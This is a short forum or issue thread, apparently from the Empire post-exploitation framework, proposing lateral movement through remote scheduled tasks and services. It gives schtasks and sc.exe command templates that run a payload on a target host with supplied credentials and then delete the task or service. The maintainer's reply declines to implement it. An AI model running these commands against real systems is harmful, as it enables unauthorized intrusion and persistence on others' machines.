Lateral Movement with schtasks and sc

[TheKevinWang]

schtask and sc are really easy to use for lateral movement. I have gotten both methods to work with Empire, but I used a short stager. Services are also a good method for privileged persistence.

schtasks /create /F /tn $TaskName /tr $Payload /sc once /st 23:00 /s $Target /U $Usr /P $Pwd 
schtasks /run /F /tn $TaskName /s $Target /U $Usr /P $Pwd 
schtasks /delete /F /tn $TaskName

sc.exe \\$Target create $ServiceName displayname= $DisplayName binpath= $Payload start= demand 
sc.exe \\$Target start $ServiceName
sc.exe \\$Target delete $ServiceName

Both methods were supposedly used by Duqu 2.0 when they hacked Kaspersky.

[xorrior]

@TheKevinWang, this isn't a priority at the moment and i just don't have the cycles to implement this. Feel free to submit a PR if this is something you really need.